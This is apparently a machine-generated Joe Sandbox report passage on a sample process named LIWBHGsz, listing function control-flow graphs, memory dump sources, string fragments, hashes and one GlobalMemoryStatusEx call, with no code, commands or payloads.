                                                                                                                                  control_flow_graph 128 6ceb6a0-6ceb6c2 129 6ceb6c4-6ceb6c7 128->129 130 6ceb6c9-6ceb6d2 129->130 131 6ceb6d7-6ceb6da 129->131 130->131 132 6ceb6dc-6ceb6e0 131->132 133 6ceb701-6ceb704 131->133 134 6ceba4b-6ceba86 132->134 135 6ceb6e6-6ceb6f6 132->135 136 6ceb706-6ceb70c 133->136 137 6ceb711-6ceb714 133->137 146 6ceba88-6ceba8b 134->146 143 6ceb9c1-6ceb9c2 135->143 145 6ceb6fc 135->145 136->137 138 6ceb71e-6ceb721 137->138 139 6ceb716-6ceb719 137->139 142 6ceb727-6ceb72a 138->142 138->143 139->138 147 6ceb72c-6ceb731 142->147 148 6ceb734-6ceb737 142->148 144 6ceb9c7-6ceb9ca 143->144 149 6ceba2e-6ceba30 144->149 150 6ceb9cc-6ceba29 call 6ce65f8 144->150 145->133 151 6cebaae-6cebab1 146->151 152 6ceba8d-6cebaa9 146->152 147->148 153 6ceb74e-6ceb751 148->153 154 6ceb739-6ceb73d 148->154 159 6ceba37-6ceba3a 149->159 160 6ceba32 149->160 150->149 155 6cebd1d-6cebd1f 151->155 156 6cebab7-6cebadf 151->156 152->151 157 6ceb765-6ceb768 153->157 158 6ceb753-6ceb75a 153->158 154->134 161 6ceb743-6ceb749 154->161 162 6cebd26-6cebd29 155->162 163 6cebd21 155->163 209 6cebae9-6cebb2d 156->209 210 6cebae1-6cebae4 156->210 166 6ceb77f-6ceb782 157->166 167 6ceb76a-6ceb76e 157->167 164 6ceb873-6ceb87c 158->164 165 6ceb760 158->165 159->129 168 6ceba40-6ceba4a 159->168 160->159 161->153 162->146 171 6cebd2f-6cebd38 162->171 163->162 174 6ceb881-6ceb884 164->174 165->157 175 6ceb784-6ceb799 166->175 176 6ceb7c0-6ceb7c3 166->176 167->134 173 6ceb774-6ceb77a 167->173 173->166 178 6ceb89b-6ceb89e 174->178 179 6ceb886-6ceb88a 174->179 175->134 194 6ceb79f-6ceb7bb 175->194 181 6ceb7c5-6ceb7ce 176->181 182 6ceb7d3-6ceb7d6 176->182 189 6ceb8aa-6ceb8ad 178->189 190 6ceb8a0-6ceb8a3 178->190 179->134 187 6ceb890-6ceb896 179->187 181->182 184 6ceb7fd-6ceb800 182->184 185 6ceb7d8-6ceb7dc 182->185 192 6ceb802-6ceb80b 184->192 193 6ceb810-6ceb813 184->193 185->134 191 6ceb7e2-6ceb7f2 185->191 187->178 198 6ceb8af-6ceb8b1 189->198 199 6ceb8b4-6ceb8b7 189->199 196 6ceb844-6ceb847 190->196 197 6ceb8a5 190->197 191->132 218 6ceb7f8 191->218 192->193 193->143 204 6ceb819-6ceb81c 193->204 194->176 196->134 200 6ceb84d-6ceb854 196->200 197->189 198->199 201 6ceb8ca-6ceb8cd 199->201 202 6ceb8b9-6ceb8c5 199->202 205 6ceb859-6ceb85c 200->205 207 6ceb8cf-6ceb8d3 201->207 208 6ceb8f4-6ceb8f7 201->208 202->201 211 6ceb81e-6ceb83a 204->211 212 6ceb83f-6ceb842 204->212 215 6ceb86e-6ceb871 205->215 216 6ceb85e 205->216 207->134 219 6ceb8d9-6ceb8e9 207->219 220 6ceb8f9-6ceb8fc 208->220 221 6ceb901-6ceb904 208->221 246 6cebd12-6cebd1c 209->246 247 6cebb33-6cebb3c 209->247 210->171 211->212 212->196 212->205 215->164 215->174 226 6ceb866-6ceb869 216->226 218->184 219->185 233 6ceb8ef 219->233 220->221 221->143 224 6ceb90a-6ceb90d 221->224 228 6ceb90f-6ceb918 224->228 229 6ceb923-6ceb926 224->229 226->215 236 6ceb91e 228->236 237 6ceb9a1-6ceb9aa 228->237 230 6ceb928-6ceb93d 229->230 231 6ceb965-6ceb968 229->231 230->134 248 6ceb943-6ceb960 230->248 231->190 239 6ceb96e-6ceb971 231->239 233->208 236->229 237->134 238 6ceb9b0-6ceb9b7 237->238 240 6ceb9bc-6ceb9bf 238->240 243 6ceb993-6ceb996 239->243 244 6ceb973-6ceb98e 239->244 240->143 240->144 243->228 249 6ceb99c-6ceb99f 243->249 244->243 250 6cebd08-6cebd0d 247->250 251 6cebb42-6cebbae call 6ce65f8 247->251 248->231 249->237 249->240 250->246 262 6cebca8-6cebcbd 251->262 263 6cebbb4-6cebbb9 251->263 262->250 265 6cebbbb-6cebbc1 263->265 266 6cebbd5 263->266 268 6cebbc7-6cebbc9 265->268 269 6cebbc3-6cebbc5 265->269 267 6cebbd7-6cebbdd 266->267 270 6cebbdf-6cebbe5 267->270 271 6cebbf2-6cebbff 267->271 272 6cebbd3 268->272 269->272 273 6cebbeb 270->273 274 6cebc93-6cebca2 270->274 279 6cebc17-6cebc24 271->279 280 6cebc01-6cebc07 271->280 272->267 273->271 275 6cebc5a-6cebc67 273->275 276 6cebc26-6cebc33 273->276 274->262 274->263 287 6cebc7f-6cebc8c 275->287 288 6cebc69-6cebc6f 275->288 285 6cebc4b-6cebc58 276->285 286 6cebc35-6cebc3b 276->286 279->274 282 6cebc0b-6cebc0d 280->282 283 6cebc09 280->283 282->279 283->279 285->274 290 6cebc3f-6cebc41 286->290 291 6cebc3d 286->291 287->274 292 6cebc73-6cebc75 288->292 293 6cebc71 288->293 290->285 291->285 292->287 293->287
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: 906a968808cbe5a2624390f335fc01b5f853bc0beb19ece1b2f0c97d587b4ae7
                                                                                                                                  • Instruction ID: c9a83d7884777f03e4a00aba869db14d420380c2afb36d6da839653b9cc748b8
                                                                                                                                  • Opcode Fuzzy Hash: 906a968808cbe5a2624390f335fc01b5f853bc0beb19ece1b2f0c97d587b4ae7
                                                                                                                                  • Instruction Fuzzy Hash: 59027B30E1020A8FDFA4DF69D6806ADB7B2FB45310F24856AD405EB395DB34EE85CB91
                                                                                                                                  Function 06CE91A0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 296 6ce91a0-6ce91c5 297 6ce91c7-6ce91ca 296->297 298 6ce91cc-6ce91eb 297->298 299 6ce91f0-6ce91f3 297->299 298->299 300 6ce91f9-6ce920e 299->300 301 6ce9ab3-6ce9ab5 299->301 308 6ce9226-6ce923c 300->308 309 6ce9210-6ce9216 300->309 303 6ce9abc-6ce9abf 301->303 304 6ce9ab7 301->304 303->297 305 6ce9ac5-6ce9acf 303->305 304->303 313 6ce9247-6ce9249 308->313 310 6ce921a-6ce921c 309->310 311 6ce9218 309->311 310->308 311->308 314 6ce924b-6ce9251 313->314 315 6ce9261-6ce92d2 313->315 316 6ce9255-6ce9257 314->316 317 6ce9253 314->317 326 6ce92fe-6ce931a 315->326 327 6ce92d4-6ce92f7 315->327 316->315 317->315 332 6ce931c-6ce933f 326->332 333 6ce9346-6ce9361 326->333 327->326 332->333 338 6ce938c-6ce93a7 333->338 339 6ce9363-6ce9385 333->339 344 6ce93a9-6ce93cb 338->344 345 6ce93d2-6ce93dc 338->345 339->338 344->345 346 6ce93de-6ce93e7 345->346 347 6ce93ec-6ce9466 345->347 346->305 353 6ce9468-6ce9486 347->353 354 6ce94b3-6ce94c8 347->354 358 6ce9488-6ce9497 353->358 359 6ce94a2-6ce94b1 353->359 354->301 358->359 359->353 359->354
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                  • Opcode ID: fda9fdf882054eb4b51595caee433808155bc049090fa690d041770628c36c1e
                                                                                                                                  • Instruction ID: 5dd5b510541b53928bfca2a2c3050dd432ed6686d84c1ad65ecbc4fe500e2e9d
                                                                                                                                  • Opcode Fuzzy Hash: fda9fdf882054eb4b51595caee433808155bc049090fa690d041770628c36c1e
                                                                                                                                  • Instruction Fuzzy Hash: 6C913130F1020A8FDF64DF66D9507AEB7F6EF84240F108569D40AAB398EA74ED41CB90
                                                                                                                                  Function 06CECFA8 Relevance: 4.5, Strings: 3, Instructions: 795COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 362 6cecfa8-6cecfc3 363 6cecfc5-6cecfc8 362->363 364 6cecfca-6ced00c 363->364 365 6ced011-6ced014 363->365 364->365 366 6ced016-6ced02c 365->366 367 6ced031-6ced034 365->367 366->367 368 6ced07d-6ced080 367->368 369 6ced036-6ced078 367->369 371 6ced08f-6ced092 368->371 372 6ced082-6ced084 368->372 369->368 378 6ced0db-6ced0de 371->378 379 6ced094-6ced0a3 371->379 376 6ced48d 372->376 377 6ced08a 372->377 385 6ced490-6ced49c 376->385 377->371 382 6ced0e8-6ced0eb 378->382 383 6ced0e0-6ced0e5 378->383 380 6ced0a5-6ced0aa 379->380 381 6ced0b2-6ced0be 379->381 380->381 388 6ced0c4-6ced0d6 381->388 389 6ced9c1-6ced9f6 381->389 392 6ced0ed-6ced12f 382->392 393 6ced134-6ced137 382->393 383->382 386 6ced18e-6ced19d 385->386 387 6ced4a2-6ced78f 385->387 394 6ced19f-6ced1a4 386->394 395 6ced1ac-6ced1b8 386->395 574 6ced9b6-6ced9c0 387->574 575 6ced795-6ced79b 387->575 388->378 408 6ced9f8-6ced9fb 389->408 392->393 396 6ced139-6ced17b 393->396 397 6ced180-6ced183 393->397 394->395 395->389 401 6ced1be-6ced1d0 395->401 396->397 397->385 398 6ced189-6ced18c 397->398 398->386 406 6ced1d5-6ced1d8 398->406 401->406 413 6ced1da-6ced21c 406->413 414 6ced221-6ced224 406->414 415 6ced9fd call 6cedb15 408->415 416 6ceda0a-6ceda0d 408->416 413->414 420 6ced26d-6ced270 414->420 421 6ced226-6ced268 414->421 430 6ceda03-6ceda05 415->430 418 6ceda0f-6ceda3b 416->418 419 6ceda40-6ceda43 416->419 418->419 425 6ceda66-6ceda68 419->425 426 6ceda45-6ceda61 419->426 423 6ced2b9-6ced2bc 420->423 424 6ced272-6ced2b4 420->424 421->420 436 6ced2be-6ced300 423->436 437 6ced305-6ced308 423->437 424->423 433 6ceda6f-6ceda72 425->433 434 6ceda6a 425->434 426->425 430->416 433->408 444 6ceda74-6ceda83 433->444 434->433 436->437 442 6ced30a-6ced30c 437->442 443 6ced313-6ced316 437->443 448 6ced30e 442->448 449 6ced34b-6ced354 442->449 450 6ced318-6ced334 443->450 451 6ced339-6ced33b 443->451 465 6cedaea-6cedaff 444->465 466 6ceda85-6cedae8 call 6ce65f8 444->466 448->443 461 6ced356-6ced35b 449->461 462 6ced363-6ced36f 449->462 450->451 458 6ced33d 451->458 459 6ced342-6ced345 451->459 458->459 459->363 459->449 461->462 469 6ced375-6ced389 462->469 470 6ced480-6ced485 462->470 466->465 469->376 485 6ced38f-6ced3a1 469->485 470->376 494 6ced3c5-6ced3c7 485->494 495 6ced3a3-6ced3a9 485->495 499 6ced3d1-6ced3dd 494->499 496 6ced3ad-6ced3b9 495->496 497 6ced3ab 495->497 500 6ced3bb-6ced3c3 496->500 497->500 506 6ced3df-6ced3e9 499->506 507 6ced3eb 499->507 500->499 509 6ced3f0-6ced3f2 506->509 507->509 509->376 511 6ced3f8-6ced414 call 6ce65f8 509->511 520 6ced416-6ced41b 511->520 521 6ced423-6ced42f 511->521 520->521 521->470 523 6ced431-6ced47e 521->523 523->376 576 6ced79d-6ced7a2 575->576 577 6ced7aa-6ced7b3 575->577 576->577 577->389 578 6ced7b9-6ced7cc 577->578 580 6ced9a6-6ced9b0 578->580 581 6ced7d2-6ced7d8 578->581 580->574 580->575 582 6ced7da-6ced7df 581->582 583 6ced7e7-6ced7f0 581->583 582->583 583->389 584 6ced7f6-6ced817 583->584 587 6ced819-6ced81e 584->587 588 6ced826-6ced82f 584->588 587->588 588->389 589 6ced835-6ced852 588->589 589->580 592 6ced858-6ced85e 589->592 592->389 593 6ced864-6ced87d 592->593 595 6ced999-6ced9a0 593->595 596 6ced883-6ced8aa 593->596 595->580 595->592 596->389 599 6ced8b0-6ced8ba 596->599 599->389 600 6ced8c0-6ced8d7 599->600 602 6ced8d9-6ced8e4 600->602 603 6ced8e6-6ced901 600->603 602->603 603->595 608 6ced907-6ced920 call 6ce65f8 603->608 612 6ced92f-6ced938 608->612 613 6ced922-6ced927 608->613 612->389 614 6ced93e-6ced992 612->614 613->612 614->595
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2086306503
                                                                                                                                  • Opcode ID: 3eb350d2b244400fb6731e321b8d08f16852a8eb162bbf88ed2b856f49e45fad
                                                                                                                                  • Instruction ID: 776a095d3b7a059407efa3a89ae1b113e6912399e251d8738c7c97af0d91997a
                                                                                                                                  • Opcode Fuzzy Hash: 3eb350d2b244400fb6731e321b8d08f16852a8eb162bbf88ed2b856f49e45fad
                                                                                                                                  • Instruction Fuzzy Hash: 27624070A102068FCB55DF69D690A5EB7B2FF84300B208A69D4169F369DB75FD86CB80
                                                                                                                                  Function 06CE4BF0 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 622 6ce4bf0-6ce4c14 623 6ce4c16-6ce4c19 622->623 624 6ce4c1f-6ce4d17 623->624 625 6ce52f8-6ce52fb 623->625 645 6ce4d1d-6ce4d6a call 6ce5499 624->645 646 6ce4d9a-6ce4da1 624->646 626 6ce531c-6ce531e 625->626 627 6ce52fd-6ce5317 625->627 629 6ce5325-6ce5328 626->629 630 6ce5320 626->630 627->626 629->623 631 6ce532e-6ce533b 629->631 630->629 659 6ce4d70-6ce4d8c 645->659 647 6ce4da7-6ce4e17 646->647 648 6ce4e25-6ce4e2e 646->648 665 6ce4e19 647->665 666 6ce4e22 647->666 648->631 663 6ce4d8e 659->663 664 6ce4d97-6ce4d98 659->664 663->664 664->646 665->666 666->648
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fpq$XPpq$\Opq
                                                                                                                                  • API String ID: 0-2571271785
                                                                                                                                  • Opcode ID: 173458369c9fa012948c78f59aa059b83183deeeb745c1a6eebb4c7c539c466d
                                                                                                                                  • Instruction ID: fb4231fb4a7bf12a7efa06737da2fef4085abadbebfd1849b14649e908544cc6
                                                                                                                                  • Opcode Fuzzy Hash: 173458369c9fa012948c78f59aa059b83183deeeb745c1a6eebb4c7c539c466d
                                                                                                                                  • Instruction Fuzzy Hash: 3E615071F002099FEB549FA5C854BAEBBF6FB88700F20852ED606AB394DA754D45CB90
                                                                                                                                  Function 06CE9193 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1549 6ce9193-6ce91c5 1551 6ce91c7-6ce91ca 1549->1551 1552 6ce91cc-6ce91eb 1551->1552 1553 6ce91f0-6ce91f3 1551->1553 1552->1553 1554 6ce91f9-6ce920e 1553->1554 1555 6ce9ab3-6ce9ab5 1553->1555 1562 6ce9226-6ce923c 1554->1562 1563 6ce9210-6ce9216 1554->1563 1557 6ce9abc-6ce9abf 1555->1557 1558 6ce9ab7 1555->1558 1557->1551 1559 6ce9ac5-6ce9acf 1557->1559 1558->1557 1567 6ce9247-6ce9249 1562->1567 1564 6ce921a-6ce921c 1563->1564 1565 6ce9218 1563->1565 1564->1562 1565->1562 1568 6ce924b-6ce9251 1567->1568 1569 6ce9261-6ce92d2 1567->1569 1570 6ce9255-6ce9257 1568->1570 1571 6ce9253 1568->1571 1580 6ce92fe-6ce931a 1569->1580 1581 6ce92d4-6ce92f7 1569->1581 1570->1569 1571->1569 1586 6ce931c-6ce933f 1580->1586 1587 6ce9346-6ce9361 1580->1587 1581->1580 1586->1587 1592 6ce938c-6ce93a7 1587->1592 1593 6ce9363-6ce9385 1587->1593 1598 6ce93a9-6ce93cb 1592->1598 1599 6ce93d2-6ce93dc 1592->1599 1593->1592 1598->1599 1600 6ce93de-6ce93e7 1599->1600 1601 6ce93ec-6ce9466 1599->1601 1600->1559 1607 6ce9468-6ce9486 1601->1607 1608 6ce94b3-6ce94c8 1601->1608 1612 6ce9488-6ce9497 1607->1612 1613 6ce94a2-6ce94b1 1607->1613 1608->1555 1612->1613 1613->1607 1613->1608
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                  • Opcode ID: af0a597b756bb6391e40aa81ff28dbcce0d040401ce4d4fbd1f6722adca2a7d5
                                                                                                                                  • Instruction ID: ae04bf3f16610fadc95a6bd6befe9dd01edb1217ae3027350b8b3e5e2136c617
                                                                                                                                  • Opcode Fuzzy Hash: af0a597b756bb6391e40aa81ff28dbcce0d040401ce4d4fbd1f6722adca2a7d5
                                                                                                                                  • Instruction Fuzzy Hash: 02515030B001058FDF54EF7AD994B6EB7F6EB88640F108569D80ADB398EA35ED41CB90
                                                                                                                                  Function 0309EB30 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1679 309eb30-309eb4b 1680 309eb4d-309eb74 1679->1680 1681 309eb75-309eb94 call 309e730 1679->1681 1686 309eb9a-309ebf9 1681->1686 1687 309eb96-309eb99 1681->1687 1694 309ebfb-309ebfe 1686->1694 1695 309ebff-309ec8c GlobalMemoryStatusEx 1686->1695 1699 309ec8e-309ec94 1695->1699 1700 309ec95-309ecbd 1695->1700 1699->1700
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4258817348.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_3090000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 456a7a631915475b48cf28f8ab2491284422def1595ef8ad7f515596beaf629f
                                                                                                                                  • Instruction ID: 2aebbfac2e9342532e588bccfc196b488561862f000a9d5f78535958d64978e4
                                                                                                                                  • Opcode Fuzzy Hash: 456a7a631915475b48cf28f8ab2491284422def1595ef8ad7f515596beaf629f
                                                                                                                                  • Instruction Fuzzy Hash: A2412072E013999FDB14DFA9D8042EEBFF1AF99310F14866AD504A7391DB349845CBA0
                                                                                                                                  Function 0309EC18 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1703 309ec18-309ec56 1704 309ec5e-309ec8c GlobalMemoryStatusEx 1703->1704 1705 309ec8e-309ec94 1704->1705 1706 309ec95-309ecbd 1704->1706 1705->1706
                                                                                                                                  APIs
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0309EC7F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4258817348.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_3090000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1890195054-0
                                                                                                                                  • Opcode ID: 7cb3aa8e80d9b7f5b2d44e90a5124f9d0acfd5e4cf448536726edd718e1843af
                                                                                                                                  • Instruction ID: 2c4f02ab013173247871cbb30d9cfc9770e10ccb361c7b5fc082d884c92b5a3f
                                                                                                                                  • Opcode Fuzzy Hash: 7cb3aa8e80d9b7f5b2d44e90a5124f9d0acfd5e4cf448536726edd718e1843af
                                                                                                                                  • Instruction Fuzzy Hash: 4011F0B2C00669DBDB10DF9AC544BDEFBF4AF48320F14816AD858A7251D378A944CFA5
                                                                                                                                  Function 06CE4BE0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: XPpq
                                                                                                                                  • API String ID: 0-1266478781
                                                                                                                                  • Opcode ID: bc3571a126e1c16b2e903a161446dc4639a998df3227f23c1c162940b8400067
                                                                                                                                  • Instruction ID: 836b4e7ec9ab745b13401b43500d29cfb0a2fbf4ae10b4c5d79480529e7332d6
                                                                                                                                  • Opcode Fuzzy Hash: bc3571a126e1c16b2e903a161446dc4639a998df3227f23c1c162940b8400067
                                                                                                                                  • Instruction Fuzzy Hash: F1415174E002099FDB549FB5C814BAEBBF6EF98700F20852ED105AB3A5DA758C45CB91
                                                                                                                                  Function 06CEDB15 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PHkq
                                                                                                                                  • API String ID: 0-902561536
                                                                                                                                  • Opcode ID: 03701854dee1b0f25316014c4e98986e20444bf5559ef414c1a3113a86f1fc20
                                                                                                                                  • Instruction ID: 59f438680a6a9cc1fabfd604fbbe62c19c177d570fbe71437615e38c9d6ce078
                                                                                                                                  • Opcode Fuzzy Hash: 03701854dee1b0f25316014c4e98986e20444bf5559ef414c1a3113a86f1fc20
                                                                                                                                  • Instruction Fuzzy Hash: 9341BF70E006099FDB64DF65C55069EBBB6FF85340F20492EE412EB340EB74E982CB90
                                                                                                                                  Function 06CE2290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PHkq
                                                                                                                                  • API String ID: 0-902561536
                                                                                                                                  • Opcode ID: a5f8c5380bbb1a00f7c4aacf8e3efce87c11bc23777df9cc6af8f55516d7a419
                                                                                                                                  • Instruction ID: cb8d2d21cb7af11d66405b2806a885bc6e09eca39a887f177388c1d856209b5a
                                                                                                                                  • Opcode Fuzzy Hash: a5f8c5380bbb1a00f7c4aacf8e3efce87c11bc23777df9cc6af8f55516d7a419
                                                                                                                                  • Instruction Fuzzy Hash: BD31E230B002058FCB54AB35D55476F7AFABB89710F24882DD406DB394DE39DE86CB91
                                                                                                                                  Function 06CE6248 Relevance: .2, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2192096e957ae88c685be9c3788e80c665ede1ff3ad5adbea3335a22e8655c0c
                                                                                                                                  • Instruction ID: a8faac576129ee009d19f5414c22adc960d801a696c57f370a59f75eb05c2d2e
                                                                                                                                  • Opcode Fuzzy Hash: 2192096e957ae88c685be9c3788e80c665ede1ff3ad5adbea3335a22e8655c0c
                                                                                                                                  • Instruction Fuzzy Hash: 9561C3B2F101114BDF519A7EC88466EAAEBEFE4620B154039E80ADB379DE65DD0287C1
                                                                                                                                  Function 06CE4321 Relevance: .2, Instructions: 228COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 67f5ae791935f61c9e99997fa8873582bda7d18a751cd14c821c26e5633d03e8
                                                                                                                                  • Instruction ID: e09effa99c3a3449d1762829c839d0ca2071db53e4c56d0fe8f1598bb99971f9
                                                                                                                                  • Opcode Fuzzy Hash: 67f5ae791935f61c9e99997fa8873582bda7d18a751cd14c821c26e5633d03e8
                                                                                                                                  • Instruction Fuzzy Hash: 68814E34F002058FDF58DFA9D5946AEB7F6EB88310F208529E50ADB395EB34DD428B91
                                                                                                                                  Function 06CE4640 Relevance: .2, Instructions: 221COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e161d220dfb748230d538f91dd63181a2f592dc36abbef09b59d47bbb45a18aa
                                                                                                                                  • Instruction ID: 8c51b13073b9e43b1df39f9d61ce1c9b7e5aa6ac13beb69a9d6dabe2dc38411d
                                                                                                                                  • Opcode Fuzzy Hash: e161d220dfb748230d538f91dd63181a2f592dc36abbef09b59d47bbb45a18aa
                                                                                                                                  • Instruction Fuzzy Hash: 92914A30E106198FDF64DF68C850B9DBBB1FF89300F20859AD549EB395DB70AA85CB90
                                                                                                                                  Function 06CEAF78 Relevance: .2, Instructions: 215COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000E.00000002.4279440475.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_14_2_6ce0000_LIWBHGsz.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 78973994921c380ee291cfc60efa735c300b835ff477095e6418d9e3fa3c95d2
                                                                                                                                  • Instruction ID: ceaa3de504bad7d86837340564fa1a7e02caf91ff38d9c7cf353578fd145260c
